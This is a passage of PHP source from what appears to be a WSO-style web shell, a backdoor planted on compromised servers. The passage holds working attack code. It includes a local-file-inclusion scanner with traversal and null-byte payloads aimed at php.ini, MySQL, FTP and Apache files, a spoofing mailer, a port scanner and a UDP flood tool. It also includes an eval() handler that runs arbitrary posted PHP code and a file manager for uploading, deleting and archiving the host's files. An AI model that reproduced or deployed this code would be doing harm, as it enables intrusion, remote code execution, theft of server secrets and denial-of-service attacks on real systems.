595 33 => "../../../../../../../../../../../../../../../usr/local/php4/httpd.conf".$byte1."",
596 34 => "../../../../../../../../../../../../../../../usr/local/php5/httpd.conf".$byte1."",
597 35 => "../../../../../../../../../../../../../../../usr/local/etc/apache/vhosts.conf".$byte1."");
598
599 $lfiphpini = array(
600 1 => "../../../../../../../../../../../../../../../etc/php.ini".$byte1."",
601 2 => "../../../../../../../../../../../../../../../bin/php.ini".$byte1."",
602 3 => "../../../../../../../../../../../../../../../etc/httpd/php.ini".$byte1."",
603 4 => "../../../../../../../../../../../../../../../usr/lib/php.ini".$byte1."",
604 5 => "../../../../../../../../../../../../../../../usr/lib/php/php.ini".$byte1."",
605 6 => "../../../../../../../../../../../../../../../usr/local/etc/php.ini".$byte1."",
606 7 => "../../../../../../../../../../../../../../../usr/local/lib/php.ini".$byte1."",
607 8 => "../../../../../../../../../../../../../../../usr/local/php/lib/php.ini".$byte1."",
608 9 => "../../../../../../../../../../../../../../../usr/local/php4/lib/php.ini".$byte1."",
609 10 => "../../../../../../../../../../../../../../../usr/local/php5/lib/php.ini".$byte1."",
610 11 => "../../../../../../../../../../../../../../../usr/local/apache/conf/php.ini".$byte1."",
611 12 => "../../../../../../../../../../../../../../../etc/php4.4/fcgi/php.ini".$byte1."",
612 13 => "../../../../../../../../../../../../../../../etc/php4/apache/php.ini".$byte1."",
613 14 => "../../../../../../../../../../../../../../../etc/php4/apache2/php.ini".$byte1."",
614 15 => "../../../../../../../../../../../../../../../etc/php5/apache/php.ini".$byte1."",
615 16 => "../../../../../../../../../../../../../../../etc/php5/apache2/php.ini".$byte1."",
616 17 => "../../../../../../../../../../../../../../../etc/php/php.ini".$byte1."",
617 18 => "../../../../../../../../../../../../../../../etc/php/php4/php.ini".$byte1."",
618 19 => "../../../../../../../../../../../../../../../etc/php/apache/php.ini".$byte1."",
619 20 => "../../../../../../../../../../../../../../../etc/php/apache2/php.ini".$byte1."",
620 21 => "../../../../../../../../../../../../../../../web/conf/php.ini".$byte1."",
621 22 => "../../../../../../../../../../../../../../../usr/local/Zend/etc/php.ini".$byte1."",
622 23 => "../../../../../../../../../../../../../../../opt/xampp/etc/php.ini".$byte1."",
623 24 => "../../../../../../../../../../../../../../../var/local/www/conf/php.ini".$byte1."",
624 25 => "../../../../../../../../../../../../../../../etc/php/cgi/php.ini".$byte1."",
625 26 => "../../../../../../../../../../../../../../../etc/php4/cgi/php.ini".$byte1."",
626 27 => "../../../../../../../../../../../../../../../etc/php5/cgi/php.ini".$byte1."");
627
628 $lfimysql = array(
629 1 => "../../../../../../../../../../../../../../../var/log/mysql/mysql-bin.log".$byte1."",
630 2 => "../../../../../../../../../../../../../../../var/log/mysql.log".$byte1."",
631 3 => "../../../../../../../../../../../../../../../var/log/mysqlderror.log".$byte1."",
632 4 => "../../../../../../../../../../../../../../../var/log/mysql/mysql.log".$byte1."",
633 5 => "../../../../../../../../../../../../../../../var/log/mysql/mysql-slow.log".$byte1."",
634 6 => "../../../../../../../../../../../../../../../var/mysql.log".$byte1."",
635 7 => "../../../../../../../../../../../../../../../var/lib/mysql/my.cnf".$byte1."",
636 8 => "../../../../../../../../../../../../../../../etc/mysql/my.cnf".$byte1."",
637 9 => "../../../../../../../../../../../../../../../var/log/mysqld.log".$byte1."",
638 10 => "../../../../../../../../../../../../../../../etc/my.cnf".$byte1."");
639
640 $lfiftp = array(
641 1 => "../../../../../../../../../../../../../../../etc/logrotate.d/proftpd".$byte1."",
642 2 => "../../../../../../../../../../../../../../../www/logs/proftpd.system.log".$byte1."",
643 3 => "../../../../../../../../../../../../../../../var/log/proftpd".$byte1."",
644 4 => "../../../../../../../../../../../../../../../etc/proftp.conf".$byte1."",
645 5 => "../../../../../../../../../../../../../../../etc/protpd/proftpd.conf".$byte1."",
646 6 => "../../../../../../../../../../../../../../../etc/vhcs2/proftpd/proftpd.conf".$byte1."",
647 7 => "../../../../../../../../../../../../../../../etc/proftpd/modules.conf".$byte1."",
648 8 => "../../../../../../../../../../../../../../../var/log/vsftpd.log".$byte1."",
649 9 => "../../../../../../../../../../../../../../../etc/vsftpd.chroot_list".$byte1."",
650 10 => "../../../../../../../../../../../../../../../etc/logrotate.d/vsftpd.log".$byte1."",
651 11 => "../../../../../../../../../../../../../../../etc/vsftpd/vsftpd.conf".$byte1."",
652 12 => "../../../../../../../../../../../../../../../etc/vsftpd.conf".$byte1."",
653 13 => "../../../../../../../../../../../../../../../etc/chrootUsers".$byte1."",
654 14 => "../../../../../../../../../../../../../../../var/log/xferlog".$byte1."",
655 15 => "../../../../../../../../../../../../../../../var/adm/log/xferlog".$byte1."",
656 16 => "../../../../../../../../../../../../../../../etc/wu-ftpd/ftpaccess".$byte1."",
657 17 => "../../../../../../../../../../../../../../../etc/wu-ftpd/ftphosts".$byte1."",
658 18 => "../../../../../../../../../../../../../../../etc/wu-ftpd/ftpusers".$byte1."",
659 19 => "../../../../../../../../../../../../../../../usr/sbin/pure-config.pl".$byte1."",
660 20 => "../../../../../../../../../../../../../../../usr/etc/pure-ftpd.conf".$byte1."",
661 21 => "../../../../../../../../../../../../../../../etc/pure-ftpd/pure-ftpd.conf".$byte1."",
662 22 => "../../../../../../../../../../../../../../../usr/local/etc/pure-ftpd.conf".$byte1."",
663 23 => "../../../../../../../../../../../../../../../usr/local/etc/pureftpd.pdb".$byte1."",
664 24 => "../../../../../../../../../../../../../../../usr/local/pureftpd/etc/pureftpd.pdb".$byte1."",
665 25 => "../../../../../../../../../../../../../../../usr/local/pureftpd/sbin/pure-config.pl".$byte1."",
666 26 => "../../../../../../../../../../../../../../../usr/local/pureftpd/etc/pure-ftpd.conf".$byte1."",
667 27 => "../../../../../../../../../../../../../../../etc/pure-ftpd.conf".$byte1."",
668 28 => "../../../../../../../../../../../../../../../etc/pure-ftpd/pure-ftpd.pdb".$byte1."",
669 29 => "../../../../../../../../../../../../../../../etc/pureftpd.pdb".$byte1."",
670 30 => "../../../../../../../../../../../../../../../etc/pureftpd.passwd".$byte1."",
671 31 => "../../../../../../../../../../../../../../../etc/pure-ftpd/pureftpd.pdb".$byte1."",
672 32 => "../../../../../../../../../../../../../../../usr/ports/ftp/pure-ftpd/".$byte1."",
673 33 => "../../../../../../../../../../../../../../../usr/ports/net/pure-ftpd/".$byte1."",
674 34 => "../../../../../../../../../../../../../../../usr/pkgsrc/net/pureftpd/".$byte1."",
675 35 => "../../../../../../../../../../../../../../../usr/ports/contrib/pure-ftpd/".$byte1."",
676 36 => "../../../../../../../../../../../../../../../var/log/pure-ftpd/pure-ftpd.log".$byte1."",
677 37 => "../../../../../../../../../../../../../../../logs/pure-ftpd.log".$byte1."",
678 38 => "../../../../../../../../../../../../../../../var/log/pureftpd.log".$byte1."",
679 39 => "../../../../../../../../../../../../../../../var/log/ftp-proxy/ftp-proxy.log".$byte1."",
680 40 => "../../../../../../../../../../../../../../../var/log/ftp-proxy".$byte1."",
681 41 => "../../../../../../../../../../../../../../../var/log/ftplog".$byte1."",
682 42 => "../../../../../../../../../../../../../../../etc/logrotate.d/ftp".$byte1."",
683 43 => "../../../../../../../../../../../../../../../etc/ftpchroot".$byte1."",
684 44 => "../../../../../../../../../../../../../../../etc/ftphosts".$byte1."");
685
686
687 $x = 1;
688 if ( $type == 1 ) {
689 $res1 = FetchURL($target.$lfitest);
690 $res2 = FetchURL($target.$lfitest2);
691 $rhash1 = md5($res1);
692 $rhash2 = md5($res2);
693 if ($rhash1 != $rhash2) {
694 print "<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br />";
695 while($lfiaccess[$x]) {
696 $res3 = FetchURL($target.$lfiaccess[$x]);
697 $rhash3 = md5($res3);
698 if ($rhash3 != $rhash2) {
699 print "<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lfiaccess[$x]."\">".$target."".$lfiaccess[$x]."</a><br />";
700 }
701 else {
702 print "<font color='red'>[!] Failed!</font>".$target."".$lfiaccess[$x]."<br />";
703 }
704 $x++;
705 }
706 }
707 }
708 if ( $type == 2 ) {
709 $res1 = FetchURL($target.$lfitest);
710 $res2 = FetchURL($target.$lfitest2);
711 $rhash1 = md5($res1);
712 $rhash2 = md5($res2);
713 if ($rhash1 != $rhash2) {
714 print "<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br />";
715 while($lficonfig[$x]) {
716 $res3 = FetchURL($target.$lficonfig[$x]);
717 $rhash3 = md5($res3);
718 if ($rhash3 != $rhash2) {
719 print "<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lficonfig[$x]."\">".$target."".$lficonfig[$x]."</a><br />";
720 }
721 else {
722 print "<font color='red'>[!] Failed!</font>".$target."".$lficonfig[$x]."<br />";
723 }
724 $x++;
725 }
726 }
727 }
728 if ( $type == 3 ) {
729 $res1 = FetchURL($target.$lfitest);
730 $res2 = FetchURL($target.$lfitest2);
731 $rhash1 = md5($res1);
732 $rhash2 = md5($res2);
733 if ($rhash1 != $rhash2) {
734 print "<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br />";
735 while($lfierror[$x]) {
736 $res3 = FetchURL($target.$lfierror[$x]);
737 $rhash3 = md5($res3);
738 if ($rhash3 != $rhash2) {
739 print "<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lfierror[$x]."\">".$target."".$lfierror[$x]."</a><br />";
740 }
741 else {
742 print "<font color='red'>[!] Failed!</font>".$target."".$lfierror[$x]."<br />";
743 }
744 $x++;
745 }
746 }
747 }
748 if ( $type == 4 ) {
749 $res1 = FetchURL($target.$lfitest);
750 $res2 = FetchURL($target.$lfitest2);
751 $rhash1 = md5($res1);
752 $rhash2 = md5($res2);
753 if ($rhash1 != $rhash2) {
754 print "<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br />";
755 while($lfiphpini[$x]) {
756 $res3 = FetchURL($target.$lfiphpini[$x]);
757 $rhash3 = md5($res3);
758 if ($rhash3 != $rhash2) {
759 print "<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lfiphpini[$x]."\">".$target."".$lfiphpini[$x]."</a><br />";
760 }
761 else {
762 print "<font color='red'>[!] Failed!</font>".$target."".$lfiphpini[$x]."<br />";
763 }
764 $x++;
765 }
766 }
767 }
768 if ( $type == 5 ) {
769 $res1 = FetchURL($target.$lfitest);
770 $res2 = FetchURL($target.$lfitest2);
771 $rhash1 = md5($res1);
772 $rhash2 = md5($res2);
773 if ($rhash1 != $rhash2) {
774 print "<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br />";
775 while($lfimysql[$x]) {
776 $res3 = FetchURL($target.$lfimysql[$x]);
777 $rhash3 = md5($res3);
778 if ($rhash3 != $rhash2) {
779 print "<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lfimysql[$x]."\">".$target."".$lfimysql[$x]."</a><br />";
780 }
781 else {
782 print "<font color='red'>[!] Failed!</font>".$target."".$lfimysql[$x]."<br />";
783 }
784 $x++;
785 }
786 }
787 }
788 if ( $type == 6 ) {
789 $res1 = FetchURL($target.$lfitest);
790 $res2 = FetchURL($target.$lfitest2);
791 $rhash1 = md5($res1);
792 $rhash2 = md5($res2);
793 if ($rhash1 != $rhash2) {
794 print "<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br />";
795 while($lfiftp[$x]) {
796 $res3 = FetchURL($target.$lfiftp[$x]);
797 $rhash3 = md5($res3);
798 if ($rhash3 != $rhash2) {
799 print "<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lfiftp[$x]."\">".$target."".$lfiftp[$x]."</a><br />";
800 }
801 else {
802 print "<font color='red'>[!] Failed!</font>".$target."".$lfiftp[$x]."<br />";
803 }
804 $x++;
805 }
806 }
807 }
808if ( $type == 7 ) {
809 $res1 = FetchURL($target.$lfitest);
810 $res2 = FetchURL($target.$lfitest2);
811 $rhash1 = md5($res1);
812 $rhash2 = md5($res2);
813 if ($rhash1 != $rhash2) {
814 print "<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br />";{
815 $res3 = FetchURL($target.$lfiprocenv);
816 $rhash3 = md5($res3);
817 if ($rhash3 != $rhash2) {
818 print "<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lfiprocenv."\">".$target."".$lfiprocenv."</a><br />";
819 }
820 else {
821 print "<font color='red'>[!] Failed!</font>".$target."".$lfiprocenv."<br />";
822 }
823 }
824 }
825 }
826 }
827wsoFooter();
828}
829function actionphptools() {
830wsoHeader();
831?><center><?php
832//mailer
833echo '<b>Mailer</b><br>
834<form action="'.$surl.'" method=POST>
835<input type="hidden" name="a" value="phptools">
836<input type=text name=to value=to><br>
837<input type=text name=from value=from><br>
838<input type=text name=subject value=subject><br>
839<input type=text name=body value=body><br>
840<input type=submit name=submit value=Submit></form>';
841if (isset($_POST['to']) && isset($_POST['from']) && isset($_POST['subject']) && isset($_POST['body'])) {
842 $headers = 'From: '.$_POST['from'];
843 mail ($_POST['to'],$_POST['subject'],$_POST['body'],$headers);
844 echo 'Email sent.';
845}
846
847//port scanner
848echo '<br><b>Port Scanner</b><br>';
849$start = strip_tags($_POST['start']);
850$end = strip_tags($_POST['end']);
851$host = strip_tags($_POST['host']);
852
853if(isset($_POST['host']) && is_numeric($_POST['end']) && is_numeric($_POST['start'])){
854for($i = $start; $i<=$end; $i++){
855 $fp = @fsockopen($host, $i, $errno, $errstr, 3);
856 if($fp){
857 echo 'Port '.$i.' is <font color=green>open</font><br>';
858 }
859 flush();
860 }
861}else{
862?>
863<form action="?" method="POST">
864<input type="hidden" name="a" value="phptools">
865Host:<br />
866<input type="text" name="host" value="localhost"/><br />
867Port start:<br />
868<input type="text" name="start" value="0"/><br />
869Port end:<br />
870<input type="text" name="end" value="5000"/><br />
871<input type="submit" value="Scan Ports" />
872</form>
873<?php
874}
875
876//UDP
877if(isset($_POST['host'])&&is_numeric($_POST['time'])){
878 $pakits = 0;
879 ignore_user_abort(TRUE);
880 set_time_limit(0);
881
882 $exec_time = $_POST['time'];
883
884 $time = time();
885 //print "Started: ".time('h:i:s')."<br>";
886 $max_time = $time+$exec_time;
887
888 $host = $_POST['host'];
889
890 for($i=0;$i<65000;$i++){
891 $out .= 'X';
892 }
893 while(1){
894 $pakits++;
895 if(time() > $max_time){
896 break;
897 }
898 $rand = rand(1,65000);
899 $fp = fsockopen('udp://'.$host, $rand, $errno, $errstr, 5);
900 if($fp){
901 fwrite($fp, $out);
902 fclose($fp);
903 }
904 }
905 echo "<br><b>UDP Flood</b><br>Completed with $pakits (" . round(($pakits*65)/1024, 2) . " MB) packets averaging ". round($pakits/$exec_time, 2) . " packets per second \n";
906 echo '<br><br>
907 <form action="'.$surl.'" method=POST>
908 <input type="hidden" name="a" value="phptools">
909 Host: <input type=text name=host value=localhost>
910 Length (seconds): <input type=text name=time value=9999>
911 <input type=submit value=Go></form>';
912}else{ echo '<br><b>UDP Flood</b><br>
913 <form action=? method=POST>
914 <input type="hidden" name="a" value="phptools">
915 Host: <br><input type=text name=host value=localhost><br>
916 Length (seconds): <br><input type=text name=time value=9999><br>
917 <input type=submit value=Go></form>';
918}
919?></center><?php
920wsoFooter();}
921function actionPhp() {
922 if(isset($_POST['ajax'])) {
923 $_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] = true;
924 ob_start();
925 eval($_POST['p1']);
926 $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "\n\r\t\\'\0") . "';\n";
927 echo strlen($temp), "\n", $temp;
928 exit;
929 }
930 wsoHeader();
931 if(isset($_POST['p2']) && ($_POST['p2'] == 'info')) {
932 echo '<h1>PHP info</h1><div class=content><style>.p {color:#000;}</style>';
933 ob_start();
934 phpinfo();
935 $tmp = ob_get_clean();
936 $tmp = preg_replace('!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU','',$tmp);
937 $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
938 echo str_replace('<h1','<h2', $tmp) .'</div><br>';
939 }
940 if(empty($_POST['ajax']) && !empty($_POST['p1']))
941 $_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] = false;
942 echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(\'Php\',null,this.code.value);}else{g(\'Php\',null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><input type=submit value=Eval style="margin-top:5px">';
943 echo ' <input type=checkbox name=ajax value=1 '.($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>';
944 if(!empty($_POST['p1'])) {
945 ob_start();
946 eval($_POST['p1']);
947 echo htmlspecialchars(ob_get_clean());
948 }
949 echo '</pre></div>';
950 wsoFooter();
951}
952
953function actionFilesMan() {
954 wsoHeader();
955 echo '<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>';
956 if(!empty($_POST['p1'])) {
957 switch($_POST['p1']) {
958 case 'uploadFile':
959 if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name']))
960 echo "Can't upload file!";
961 break;
962 case 'mkdir':
963 if(!@mkdir($_POST['p2']))
964 echo "Can't create new dir";
965 break;
966 case 'delete':
967 function deleteDir($path) {
968 $path = (substr($path,-1)=='/') ? $path:$path.'/';
969 $dh = opendir($path);
970 while ( ($item = readdir($dh) ) !== false) {
971 $item = $path.$item;
972 if ( (basename($item) == "..") || (basename($item) == ".") )
973 continue;
974 $type = filetype($item);
975 if ($type == "dir")
976 deleteDir($item);
977 else
978 @unlink($item);
979 }
980 closedir($dh);
981 @rmdir($path);
982 }
983 if(is_array(@$_POST['f']))
984 foreach($_POST['f'] as $f) {
985 if($f == '..')
986 continue;
987 $f = urldecode($f);
988 if(is_dir($f))
989 deleteDir($f);
990 else
991 @unlink($f);
992 }
993 break;
994 case 'paste':
995 if($_SESSION['act'] == 'copy') {
996 function copy_paste($c,$s,$d){
997 if(is_dir($c.$s)){
998 mkdir($d.$s);
999 $h = @opendir($c.$s);
1000 while (($f = @readdir($h)) !== false)
1001 if (($f != ".") and ($f != ".."))
1002 copy_paste($c.$s.'/',$f, $d.$s.'/');
1003 } elseif(is_file($c.$s))
1004 @copy($c.$s, $d.$s);
1005 }
1006 foreach($_SESSION['f'] as $f)
1007 copy_paste($_SESSION['c'],$f, $GLOBALS['cwd']);
1008 } elseif($_SESSION['act'] == 'move') {
1009 function move_paste($c,$s,$d){
1010 if(is_dir($c.$s)){
1011 mkdir($d.$s);
1012 $h = @opendir($c.$s);
1013 while (($f = @readdir($h)) !== false)
1014 if (($f != ".") and ($f != ".."))
1015 copy_paste($c.$s.'/',$f, $d.$s.'/');
1016 } elseif(@is_file($c.$s))
1017 @copy($c.$s, $d.$s);
1018 }
1019 foreach($_SESSION['f'] as $f)
1020 @rename($_SESSION['c'].$f, $GLOBALS['cwd'].$f);
1021 } elseif($_SESSION['act'] == 'zip') {
1022 if(class_exists('ZipArchive')) {
1023 $zip = new ZipArchive();
1024 if ($zip->open($_POST['p2'], 1)) {
1025 chdir($_SESSION['c']);
1026 foreach($_SESSION['f'] as $f) {
1027 if($f == '..')
1028 continue;
1029 if(@is_file($_SESSION['c'].$f))
1030 $zip->addFile($_SESSION['c'].$f, $f);
1031 elseif(@is_dir($_SESSION['c'].$f)) {
1032 $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/'));
1033 foreach ($iterator as $key=>$value) {
1034 $zip->addFile(realpath($key), $key);
1035 }
1036 }
1037 }
1038 chdir($GLOBALS['cwd']);
1039 $zip->close();
1040 }
1041 }
1042 } elseif($_SESSION['act'] == 'unzip') {
1043 if(class_exists('ZipArchive')) {
1044 $zip = new ZipArchive();
1045 foreach($_SESSION['f'] as $f) {
1046 if($zip->open($_SESSION['c'].$f)) {
1047 $zip->extractTo($GLOBALS['cwd']);
1048 $zip->close();
1049 }
1050 }
1051 }
1052 } elseif($_SESSION['act'] == 'tar') {
1053 chdir($_SESSION['c']);
1054 $_SESSION['f'] = array_map('escapeshellarg', $_SESSION['f']);
1055 wsoEx('tar cfzv ' . escapeshellarg($_POST['p2']) . ' ' . implode(' ', $_SESSION['f']));
1056 chdir($GLOBALS['cwd']);
1057 }
1058 unset($_SESSION['f']);
1059 break;
1060 default:
1061 if(!empty($_POST['p1'])) {
1062 $_SESSION['act'] = @$_POST['p1'];
1063 $_SESSION['f'] = @$_POST['f'];
1064 foreach($_SESSION['f'] as $k => $f)
1065 $_SESSION['f'][$k] = urldecode($f);
1066 $_SESSION['c'] = @$_POST['c'];
1067 }
1068 break;
1069 }
1070 }
1071 $dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
1072 if($dirContent === false) { echo 'Can\'t open this folder!';wsoFooter(); return; }
1073 global $sort;
1074 $sort = array('name', 1);
1075 if(!empty($_POST['p1'])) {
1076 if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match))
1077 $sort = array($match[1], (int)$match[2]);
1078 }
1079echo "<script>
1080 function sa() {
1081 for(i=0;i<d.files.elements.length;i++)
1082 if(d.files.elements[i].type == 'checkbox')
1083 d.files.elements[i].checked = d.files.elements[0].checked;
1084 }
1085
1086</script>
1087<table width='100%' class='main' cellspacing='0' cellpadding='2'>
1088<form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>";
1089 $dirs = $files = array();
1090 $n = count($dirContent);
1091 for($i=0;$i<$n;$i++) {
1092 $ow = @posix_getpwuid(@fileowner($dirContent[$i]));
1093 $gr = @posix_getgrgid(@filegroup($dirContent[$i]));
1094 $tmp = array('name' => $dirContent[$i],
1095 'path' => $GLOBALS['cwd'].$dirContent[$i],
1096 'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])),
1097 'perms' => wsoPermsColor($GLOBALS['cwd'] . $dirContent[$i]),
1098 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]),
1099 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]),
1100 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i])
1101 );
1102 if(@is_file($GLOBALS['cwd'] . $dirContent[$i]))
1103 $files[] = array_merge($tmp, array('type' => 'file'));
1104 elseif(@is_link($GLOBALS['cwd'] . $dirContent[$i]))
1105 $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path'])));
1106 elseif(@is_dir($GLOBALS['cwd'] . $dirContent[$i])&& ($dirContent[$i] != "."))
1107 $dirs[] = array_merge($tmp, array('type' => 'dir'));
1108 }
1109 $GLOBALS['sort'] = $sort;
1110 function wsoCmp($a, $b) {
1111 if($GLOBALS['sort'][0] != 'size')
1112 return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1);
1113 else
1114 return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
1115 }
1116 usort($files, "wsoCmp");
1117 usort($dirs, "wsoCmp");
1118 $files = array_merge($dirs, $files);
1119 $l = 0;
1120 foreach($files as $f) {
1121 echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');" title=' . $f['link'] . '><b>[ ' . htmlspecialchars($f['name']) . ' ]</b>').'</a></td><td>'.(($f['type']=='file')?wsoViewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms']
1122 .'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>';
1123 $l = $l?0:1;
1124 }
1125 echo "<tr><td colspan=7>
1126
1127 <input type=hidden name=a value='FilesMan'>
1128 <input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'>
1129 <input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'')."'>
1130 <select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>";
1131 if(class_exists('ZipArchive'))
1132 echo "<option value='zip'>Compress (zip)</option><option value='unzip'>Uncompress (zip)</option>";
1133 echo "<option value='tar'>Compress (tar.gz)</option>";
1134 if(!empty($_SESSION['act']) && @count($_SESSION['f']))
1135 echo "<option value='paste'>Paste / Compress</option>";
1136 echo "</select> ";
1137 if(!empty($_SESSION['act']) && @count($_SESSION['f']) && (($_SESSION['act'] == 'zip') || ($_SESSION['act'] == 'tar')))
1138 echo "file name: <input type=text name=p2 value='wso_" . date("Ymd_His") . "." . ($_SESSION['act'] == 'zip'?'zip':'tar.gz') . "'> ";
1139 echo "<input type='submit' value='>>'></td></tr></form></table></div>";
1140 wsoFooter();
1141}
1142
1143function actionStringTools() {
1144 if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
1145 if(!function_exists('binhex')) {function binhex($p) {return dechex(bindec($p));}}
1146 if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}}
1147 if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= sprintf('%02X',ord($p[$i]));return strtoupper($r);}}
1148 if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}}
1149 $stringTools = array(
1150 'Base64 encode' => 'base64_encode',
1151 'Base64 decode' => 'base64_decode',
1152 'Url encode' => 'urlencode',
1153 'Url decode' => 'urldecode',
1154 'Full urlencode' => 'full_urlencode',
1155 'md5 hash' => 'md5',
1156 'sha1 hash' => 'sha1',
1157 'crypt' => 'crypt',
1158 'CRC32' => 'crc32',
1159 'ASCII to HEX' => 'ascii2hex',
1160 'HEX to ASCII' => 'hex2ascii',
1161 'HEX to DEC' => 'hexdec',
1162 'HEX to BIN' => 'hex2bin',
1163 'DEC to HEX' => 'dechex',
1164 'DEC to BIN' => 'decbin',
1165 'BIN to HEX' => 'binhex',
1166 'BIN to DEC' => 'bindec',
1167 'String to lower case' => 'strtolower',
1168 'String to upper case' => 'strtoupper',
1169 'Htmlspecialchars' => 'htmlspecialchars',
1170 'String length' => 'strlen',
1171 );
1172 if(isset($_POST['ajax'])) {
1173 $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
1174 ob_start();
1175 if(in_array($_POST['p1'], $stringTools))
1176 echo $_POST['p1']($_POST['p2']);
1177 $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
1178 echo strlen($temp), "\n", $temp;
1179 exit;
1180 }
1181 wsoHeader();
1182 echo '<h1>String conversions</h1><div class=content>';
1183 if(empty($_POST['ajax'])&&!empty($_POST['p1']))
1184 $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
1185 echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>";
1186 foreach($stringTools as $k => $v)
1187 echo "<option value='".htmlspecialchars($v)."'>".$k."</option>";
1188 echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 ".(@$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>".(empty($_POST['p1'])?'':htmlspecialchars(@$_POST['p2']))."</textarea></form><pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>";
1189 if(!empty($_POST['p1'])) {
1190 if(in_array($_POST['p1'], $stringTools))echo htmlspecialchars($_POST['p1']($_POST['p2']));
1191 }
1192 echo"</pre></div><br><h1>Search text in files:</h1><div class=content>
1193
1194 <form onsubmit=\"g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;\"><table cellpadding='1' cellspacing='0' width='50%'>
